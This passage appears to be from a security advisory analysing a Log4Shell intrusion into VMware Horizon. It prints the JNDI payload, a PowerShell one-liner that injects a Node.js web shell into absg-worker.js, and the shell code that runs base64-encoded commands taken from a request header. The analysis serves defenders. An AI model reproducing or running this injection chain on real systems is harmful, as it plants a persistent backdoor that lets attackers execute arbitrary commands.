The attack is very likely initiated via a Log4Shell payload similar to ${jndi:ldap://example.com}. The attack exploits the Log4Shell vulnerability in the Apache Tomcat service which is embedded within VMware Horizon. This then launches the following PowerShell command, spawned from ws_TomcatService.exe:
powershell -c "$path=gwmi win32_service|?{$.Name -like """VMBlastSG"""}|%{$.PathName -replace '"""', '' -replace """nssm.exe""","""lib\absg-worker.js"""};
The executed command invokes Get-WMIObject on win32_service, returning a list of service names containing 'VMBlastSG'. It identifies the file path for the service, replaces instances of 'nssm.exe' with 'lib/absg-worker.js' and writes this path to $path, thereby identifying the location of the 'absg-worker.js' file for the targeted VMware Horizon instance.
$expr="""req.connection.end();
if(String(req.url).includes('REDACTED')) {try {replyError(req, res, 200, require('child_process').execSync(Buffer.from(req.headers['data'], 'base64').toString('ascii')`r`n`t`t`t`t`t).toString());
catch (err) {replyError(req, res, 400, err.stderr.toString());
return;""";
This writes a code block to $expr that listens for any web requests containing a specific, hardcoded string in the URI before executing arbitrary commands contained in the 'data' header object. The output is delivered to the attacker via 'replyError' where requests contained the specified string, otherwise a standard error message is returned.
(Get-Content $path)|ForEach-Object {$_ -replace """req.connection.end()\;""", $expr}|Set-Content $path;Restart-Service -Force VMBlastSG"
Retrieves the list of service path names stored in $path and for each replaces any instances of "req.connection.end()\;" with the code block stored in $expr described above, thereby injecting the web shell. The altered 'absg-worker.js' file then contains:
The 'VMBLastSG' service is then forcibly restarted to initiate the listener.
Once established, the listener will execute arbitrary commands received in crafted web (HTTP / HTTPS) requests if a particular hardcoded string (key) is present in the URI of the request. The commands are stored as a header object (named 'data') in the crafted requests. This process is used to establish persistent communication with a command and control server that could then be used to carry out other malicious activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware.
A representative diagram of the attack is provided below: